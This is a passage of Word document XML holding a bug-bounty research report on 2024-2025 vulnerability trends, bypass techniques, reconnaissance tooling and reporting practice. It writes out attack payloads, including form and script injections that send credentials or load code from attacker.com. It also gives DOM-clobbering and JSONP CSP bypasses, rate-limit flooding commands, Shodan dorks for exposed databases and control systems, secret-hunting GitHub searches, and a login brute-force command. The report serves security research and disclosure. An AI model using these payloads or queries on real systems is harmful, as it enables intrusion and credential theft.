      </w:r>
    </w:p>
    <w:p w14:paraId="3694639F" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="75BEA01A" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Record-breaking CVE disclosures** reached 40,000+ in 2024 (38% increase), with IoT/OT particularly impacted and 10% of OT incidents involving data historians. Authentication vulnerabilities dominate the threat landscape, with default credentials, weak password requirements, and brute-force susceptibility creating widespread exposure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D110161" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="006EAA81" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Critical authentication CVEs** include CVE-2024-2013 (authentication bypass in FOXMAN-UN/UNEM requiring no prior access), CVE-2024-6515 (clear-text credentials exposed in web interfaces using base64 encoding, not encryption), CVE-2024-51551 and CVE-2024-51555 (publicly available default credentials without forced changes), and CVE-2024-51545 (username enumeration through exposed application functions). CVE-2024-28022 enabled unlimited password attempts without account lockout, facilitating brute-force attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308FB62F" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="144D0012" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>**Pro-Russia hacktivist campaigns** (CISA/FBI/NSA advisory, May 2024) targeted small-scale OT systems including HMI (Human-Machine Interface) compromises, vulnerable internet-exposed connections with default passwords lacking MFA, remote setting manipulation, and documented tank overflow incidents. Water and wastewater systems, critical manufacturing, energy sector, and food/agriculture infrastructure showed highest targeting rates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69086D18" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="034E1CE8" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Forescout 2025 analysis** reveals average device risk scores increased 15% to 8.98 (from 7.73). Most vulnerable device types include routers (\u003e50% of critical vulnerabilities), computers, wireless access points, IoMT devices (pump controllers, medication dispensing), and healthcare workstations. Geographic risk concentrates in Spain, China, and United Kingdom (average scores \u003e9.0). Industry rankings place retail highest, followed by financial services, government, healthcare, and manufacturing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B7B0B8" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="300364C7" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**IoMT (Internet of Medical Things) devices** introduced in 2024 include imaging devices (CT, PET-CT, X-ray), lab equipment, healthcare workstations, and infusion pump controllers. DICOM protocol vulnerabilities affect legacy operating systems on medical imaging devices, extensive network connectivity requirements, and file-sharing vulnerabilities enabling ransomware spread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3E0049" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="1E9DA9C4" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Microsoft findings** show 75% of industrial controllers have unpatched high-severity vulnerabilities, 78% increase in OT vulnerability disclosures (2020-2022), and 1M+ devices running outdated Boa web server publicly visible on the internet. Common web interface issues include embedded web servers with outdated frameworks, no security update mechanisms, clear-text protocols (HTTP, Telnet), session management weaknesses, token exposure, and cookie theft vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2186955A" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="431C6CAB" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Input validation failures** enable command injection in device control APIs, SQL injection in embedded databases, path traversal in firmware update mechanisms, and XXE in configuration file parsing. Bug bounty hunters should focus on default credential testing via manufacturer documentation and common lists, authentication mechanism analysis for bypass opportunities, command injection testing in device APIs and configuration panels, firmware update process security, and network service enumeration on non-standard ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3481C732" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="71C3924B" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Shodan and Censys dorks** enable mass discovery. Examples include `product:"Industrial-Control-Products"`, `port:502 "Modbus"`, `"Authentication: disabled" port:80,443`, and `ssl:"Organization Name" country:"US"`. Responsible disclosure becomes critical when discovering critical infrastructure vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D02BDF" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="2B30081E" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>## Modern security control bypasses require sophisticated techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB43559" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="586F77FD" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Content Security Policy form hijacking** (PortSwigger 2024, $1,500 bounty) exploits commonly-omitted form-action directives. Attackers inject `\u003cinput type="submit" formaction="https://attacker.com"\u003e` attributes or entire forms to redirect credentials to attacker servers. Password managers autofill hijacked forms, enabling silent credential theft. Defense requires `Content-Security-Policy: form-action 'none'` or explicit trusted origins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475B0B0A" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="0AC34837" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**DOM clobbering with script gadgets** uses anchor tag ID/name attributes clobbering properties ending in `.src`. Example payload: `\u003ca id=ehy\u003e\u003ca id=ehy name=codeBasePath href=data:,alert(1)//\u003e` exploits JavaScript code checking `window.ehy.codeBasePath` for dynamic script loading. DOM Invader (Burp Suite browser feature) automates detection. Bug bounty sites remain vulnerable to this technique when CSP relies solely on domain allowlisting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B627B2" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="671D969A" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**JSONP endpoint abuse** bypasses CSP when Google Maps, Accounts APIs, or similar services appear in script-src allowlists with callback parameter support. Example: `https://maps.googleapis.com/maps/api/js?callback=alert()` executes arbitrary JavaScript despite strict CSP. HurricaneLabs' JSONP CSP bypass guide documents popular endpoints. Testing involves searching allowlisted domains for JSONP endpoints and exploiting callback parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752781F6" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="07B1B4E1" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t xml:space="preserve">**Nonce extraction techniques** dynamically steal CSP nonces through AngularJS injection (`ng-on-error='nonce=document.querySelector("[nonce]").nonce; s=document.createElement("script"); s.src="//attacker.com/payload.js"; s.nonce=nonce; document.body.appendChild(s)'`), WebRTC DNS leak bypassing connect-src policy, and </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>PHP header injection sending 1001+ GET parameters or 21+ file uploads triggering errors preventing header() calls, causing CSP headers never reaching browsers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4774CE9D" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="672743AF" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**HTTP/2 multiplexing bypasses rate limiters** counting connections instead of streams. Attackers send 100+ parallel streams in single connections using `seq 1 100 | xargs -I@ -P0 curl --http2-prior-knowledge`. Burp Turbo Intruder with `requestsPerConnection=1000` automates this. GraphQL aliasing batches multiple operations as aliases in single requests, with one successful alias indicating correct credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685C8AEE" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="414ABE0D" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Header manipulation bypasses IP-based rate limits** through X-Forwarded-For variations (127.0.0.1, multiple headers, null values), X-Originating-IP/X-Remote-IP/X-Client-IP headers, and endpoint variations (path manipulation: `/api//login`, `/api/login/.`; version confusion: v2→v1; case variations: `/Login`). Parameter variations include null bytes (`email=user@test.com%00`), newlines (`%0a`), trailing spaces, and garbage parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B69E0A5" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="57DC17AC" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**WebAuthn/FIDO2 MITM session hijacking** (Silverfort 2023-2024) exploits missing token binding post-authentication. Despite FIDO2 validating domain during authentication, session cookies lack device binding. Attackers with valid certificates intercept sessions, steal cookies valid 30+ days, and reuse from different devices. CVE-2025-26788 (StrongKey FIDO Server 4.10.0-4.15.0) enables starting authentication with victim username and signing with attacker's passkey to access victim accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3184F388" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="547F7E46" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**MFA prompt bombing (fatigue attacks)** sends 100+ push notifications at strategic times (1AM during sleep, 9AM during routine). Users accept to stop harassment. Lapsus$ used this against Microsoft, Okta, and Nvidia. Cisco Talos reports 50% of Q1 2024 incident responses involved MFA bypass, with MFA fatigue comprising 28% of major incidents. Adversary-in-the-middle (AiTM) tools like Evilginx reverse proxy between users and real sites, intercepting both MFA codes AND session tokens for complete authentication bypass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1C236A" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="64876722" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t xml:space="preserve">**WAF padding bypasses size-based inspection limits.** AWS WAF inspects only first 8KB, enabling 9KB+ requests with garbage padding containing malicious payloads. Cloudflare </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>inspects 128KB, requiring larger padding. Fireprox (AWS API Gateway) rotates IPs per request defeating IP-based throttling. Unicode normalization attacks sanitize then normalize, with special characters normalizing to malicious equivalents post-validation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398C6416" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="59E86693" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Container and Kubernetes bypasses** target privileged containers (`securityContext.privileged: true`), running as root (requiring `runAsNonRoot: true`, `runAsUser: 1000`), excessive capabilities (drop ALL, add only necessary), writable root filesystems (enforce `readOnlyRootFilesystem: true`), host path mounts (never mount `/`, `/var/run/docker.sock`), anonymous API access (set `--anonymous-auth=false`), and missing network policies enabling unrestricted lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B3F34A" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="69892836" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>## Advanced reconnaissance leverages threat intelligence platforms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD880A6" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="05CC42C4" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Shodan, Censys, and FOFA** enable mass discovery of vulnerable services through specialized search queries. Shodan dorks include `product:"Apache" country:"US"`, `"MongoDB Server Information" port:27017 -authentication` for unauthenticated databases, `vuln:CVE-2024-3400` for specific vulnerabilities, and `ssl:"Organization Name"` for certificate-based discovery. Censys queries target `services.software.product:"Windows Server"` and `services.port:27017 AND services.service_name:"MONGODB"`. FOFA syntax uses `product="Industrial-Control-Products"` and `protocol="http" \u0026\u0026 country="US"`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082A003F" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="4E58165A" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**GitHub dorking** exposes secrets through searches like `"api_key" OR "apikey" extension:json org:target-company`, `"aws_access_key_id" extension:yml`, and `filename:.env "DB_PASSWORD"`. Certificate transparency logs via crt.sh reveal subdomains and infrastructure. Amass provides comprehensive reconnaissance through passive enumeration (`amass enum -passive -d target.com`), active enumeration with DNS brute-forcing (`amass enum -active -brute -d target.com -w wordlist.txt`), ASN discovery (`amass intel -asn 15169`), reverse WHOIS (`amass intel -whois -d target.com`), and visualization (`amass viz -d3`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245E4DA5" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="50D56957" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t xml:space="preserve">**Subfinder and httpx pipeline** forms reconnaissance foundation. Subfinder discovers subdomains: `subfinder -d target.com -all -recursive -v -o subs.txt`. httpx probes live </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>hosts: `httpx -l urls.txt -tech-detect -status-code -screenshot -json`. Nuclei scans for vulnerabilities: `nuclei -l urls.txt -t cves/ -severity critical,high -rate-limit 10`. Complete pipeline automation: `subfinder -d target.com -silent | httpx -silent | nuclei -t exposures/ -o results.txt`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26370380" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="278E17A0" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Advanced fuzzing with ffuf** employs recursive discovery (`ffuf -w wordlist.txt -u https://target.com/FUZZ -e .php,.html -fc 404 -recursion -recursion-depth 3`), multiple wordlists in clusterbomb mode (`ffuf -w users:FUZZ1 -w passwords:FUZZ2 -u https://target.com/login -X POST -d "user=FUZZ1\u0026pass=FUZZ2"`), and intelligent filtering by size, word count, or regex patterns. Gobuster provides alternative directory brute-forcing: `gobuster dir -u https://target.com -w wordlist.txt -x php,html,txt -t 50 -b 404,403`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112D0B9A" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="0822C873" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Out-of-band detection** uses Interactsh for blind vulnerability discovery. Self-hosted deployment provides privacy: `interactsh-server -d interact.example.com`. Client generates unique URLs: `interactsh-client -n 5`. Nuclei templates integrate OOB testing: `{{interactsh-url}}` placeholders enable automated correlation. Alternatives include Burp Collaborator, Pingb.in, Webhook.site, and RequestBin for simpler scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39708B6A" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="2DA13EB8" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Tool automation through Python** creates reconnaissance pipelines with subprocess integration running subfinder→httpx→nuclei chains, concurrent processing for performance, Slack/Discord notifications on vulnerability discovery, and continuous monitoring in CI/CD. GitHub Actions and GitLab CI workflows enable scheduled security testing, automated reporting, and integration with issue tracking systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEFF130" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="190477D6" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>## Bug bounty platforms prioritize report quality and impact demonstration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B760576" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="59BC6CF6" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**HackerOne, Bugcrowd, and Intigriti** lead the bug bounty ecosystem with distinct characteristics. HackerOne serves the largest programs with sophisticated triage processes and higher average payouts for well-documented reports. Bugcrowd's VRT (Vulnerability Rating Taxonomy) provides standardized severity assessment, with submission guidelines emphasizing clear impact demonstration. Intigriti focuses on European programs with researcher-friendly policies and faster response times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAD0531" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="04ACEAE4" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Common vulnerability acceptance criteria** distinguish valid from invalid reports. Valid reports demonstrate actual security impact, affect in-scope assets explicitly listed, represent genuinely exploitable vulnerabilities (not theoretical), and include clear reproduction steps. Invalid reports typically cover informational findings without security impact, out-of-scope assets or vulnerability types, known issues already reported, and issues requiring extensive user interaction unlikely in practice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BBE83E" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="5BC9944C" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Report structure determines success rates.** Effective reports begin with clear, concise vulnerability titles (XSS in User Profile, not "Security Issue"), executive summaries stating impact immediately, detailed reproduction steps with specific URLs, parameters, and payloads, proof-of-concept demonstrations via videos or screenshots, and impact assessments explaining business risk. Poor reports lack clarity, omit reproduction steps, use vague descriptions, or fail to demonstrate realistic impact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4B1886" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="5EF8C29E" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Severity ratings** (Critical/High/Medium/Low/Informational) determine payouts. Critical vulnerabilities enable remote code execution, authentication bypasses affecting all users, or sensitive data exposure at scale. High severity includes privilege escalation, data modification affecting multiple users, or IDOR accessing significant data. Medium covers XSS requiring user interaction, CSRF on sensitive operations, or information disclosure of limited data. Low and Informational findings rarely receive payment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084EFD7F" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="595F994C" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Platform statistics** reveal trends. HackerOne paid $300M+ total with average critical vulnerability bounties reaching $5,000-$10,000+ at top programs. Bugcrowd reports similar ranges with VRT-based consistency. Immunefi (Web3 focus) offers the highest payouts: Wormhole $10M, Aurora $6M, Polygon $2.2M, Optimism $2M. Time to triage averages 24-48 hours for high-severity findings at mature programs, though critical vulnerabilities often receive immediate attention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4388E03C" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="750F3FA6" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Private programs** require invitations based on reputation, with expectations including faster response times, direct communication channels, higher impact focus, and confidentiality requirements. Public programs accept all researchers but show higher competition, longer triage times, and duplicate submission risks. YesWeHack and Synack offer unique features including European data residency and verified researcher networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6509CC0C" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="43E5D53B" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Common rejection reasons** include testing out of scope (attacking infrastructure not listed), duplicate submissions (same vulnerability reported earlier), insufficient impact (theoretical issues without exploitation paths), invalid security findings (missing security implications), lack of reproduction steps (triagers cannot verify), and known issues (already documented in program notes). Successful researchers read program scopes carefully, verify uniqueness before submission, focus on demonstrable impact, provide complete reproduction steps, and use video recordings for complex issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63320F59" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="1283BE26" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Reporting best practices** emphasize video demonstrations using Loom, Snagit, or OBS for complex exploitation chains; impact assessment framing in business terms (data breach potential, financial loss, reputation damage); clean proof-of-concept code without destruction or data exfiltration; professional communication tone with clear, technical language; and prompt responses to triage questions demonstrating engagement and expertise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63227219" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="3B800F0F" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>## Conclusion: Actionable intelligence for 2025 bug bounty success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACE9475" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="22221676" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>The vulnerability landscape transformed dramatically in 2024-2025 with **enterprise technology targeting comprising 44% of zero-days** (up from 37%), average time-to-exploit shrinking from 32 days to just 5 days, and 40,000+ CVEs disclosed representing 38% growth. LLM/AI systems emerged as major attack surfaces through RAG poisoning, prompt injection evolution, and tool abuse. Container security matured but Leaky Vessels discoveries proved new CVEs continue emerging. IoT/OT authentication failures exploded with default credentials dominating 75% of industrial controller compromises.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C46B10" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="5A4BEF25" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Highest-value targets for bug bounty hunters** concentrate in enterprise network appliances (VPN gateways from Ivanti, Palo Alto, Cisco; firewall management interfaces), LLM/AI integration points (RAG implementations, AI agent tool calling, prompt injection surfaces), container and Kubernetes infrastructure (admission controllers, CRDs, service mesh configurations), serverless and edge functions (environment handling, cold start behaviors, inter-function communication), Web3/DeFi protocols (smart contract logic, oracle integrations, cross-chain bridges), and IoT/OT web interfaces (default credentials, authentication mechanisms, command injection in device APIs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E225055" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="7570AA50" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Most effective techniques** combine HTTP/2 single-packet race condition attacks (reliable TOCTOU exploitation), prototype pollution to RCE chains (Node.js server-side), HTTP request smuggling via HTTP/2 downgrade (response queue poisoning), web cache deception on CDN-heavy sites (74% vulnerability rate), OAuth redirect URI parser bypasses (subdomain confusion, @ symbol exploitation), GraphQL batching for rate limit bypass (credential stuffing via aliases), JWT algorithm confusion RS256→HS256 (public key as HMAC secret), and container escapes through privileged pods (file descriptor leaks, WORKDIR exploitation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E42AC4E" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="5ED9263E" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Essential skill development** requires mastering LLM security through indirect prompt injection via documents, RAG knowledge base poisoning, multi-modal prompt attacks, and system prompt extraction. Container escape techniques demand understanding file descriptor manipulation, build-time exploits, and symlink race conditions. Cloud-native security necessitates RBAC escalation paths, admission webhook bypasses, and service mesh sidecar exploitation. Zero-day hunting focuses on use-after-free in C/C++ codebases, command injection in enterprise appliances, and authentication bypasses in network devices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9D06BE" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="62188847" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Tool mastery centers on** Burp Suite Pro with critical extensions (Turbo Intruder for HTTP/2 races, HTTP Request Smuggler, JWT Editor, Param Miner, DOM Invader), ProjectDiscovery suite integration (subfinder→httpx→nuclei pipelines), container security tools (Trivy scanning, Kubescape for K8s), Web3 platforms (Immunefi for highest payouts, Slither/Mythril for contract analysis), and specialized tools (jwt_tool for authentication, graphql-cop for API testing, Fireprox for IP rotation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62310327" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="0D52D693" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Success patterns from disclosed reports** show $3,500+ bounties for chained vulnerabilities (CSP bypass + CORS misconfiguration + account takeover), $10M Web3 payouts (Wormhole bridge exploit), critical findings in authentication (MFA fatigue, FIDO2 session hijacking), and high-severity discoveries in cloud infrastructure (K8s API exposure, Ingress NGINX controller RCE). Time investment focuses on reconnaissance (30% - subdomain enumeration, technology fingerprinting), vulnerability discovery (40% - systematic testing of prioritized attack surfaces), exploitation development (20% - proof-of-concept creation, impact demonstration), and report writing (10% - clear documentation, video creation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFE6BFE" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="74FA297C" w14:textId="6481B7A7" w:rsidR="00014CA7" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**The future of bug bounty hunting** demands continuous learning through security conferences (DEF CON, Black Hat), platform disclosures (HackerOne reports, Bugcrowd VRT updates), research papers (academic security research, OWASP publications), and community engagement (Twitter/X security researchers, Discord communities, blog publications). Specialization in emerging technologies (LLM/AI security, Web3 protocols, cloud-native platforms) combined with deep expertise in fundamental vulnerability classes positions researchers for maximum success in the evolving landscape of 2025 and beyond.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00014CA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CA7"/>
    <w:rsid w:val="00014CA7"/>
    <w:rsid w:val="001544AC"/>
    <w:rsid w:val="007B3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6D92C9-871E-449C-B5EA-F87671376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4C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4C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4C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4C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4C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4C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4C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4C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4C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C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4C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4C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4C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4C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4C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4C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4C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4CA7"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
